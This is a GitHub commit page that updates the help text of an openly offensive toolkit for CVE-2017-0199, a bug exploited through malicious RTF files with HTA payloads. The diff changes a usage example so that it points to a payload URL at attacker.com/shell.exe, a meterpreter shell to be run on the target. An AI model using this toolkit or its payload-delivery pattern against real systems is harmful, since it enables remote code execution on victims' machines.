Skip to content

Commit

Permalink
Update cve-2017-0199_toolkit.py
Browse files Browse the repository at this point in the history
  • Loading branch information
bhdresh committed Apr 19, 2017
1 parent fa2f64a commit 666d49b
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion cve-2017-0199_toolkit.py
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,8 @@
- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13
### Future release:
Expand Down Expand Up @@ -82,7 +84,7 @@
-p <TCP port:Default 80> Local port number.
-e <http://example.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
Expand Down

0 comments on commit 666d49b

Please sign in to comment.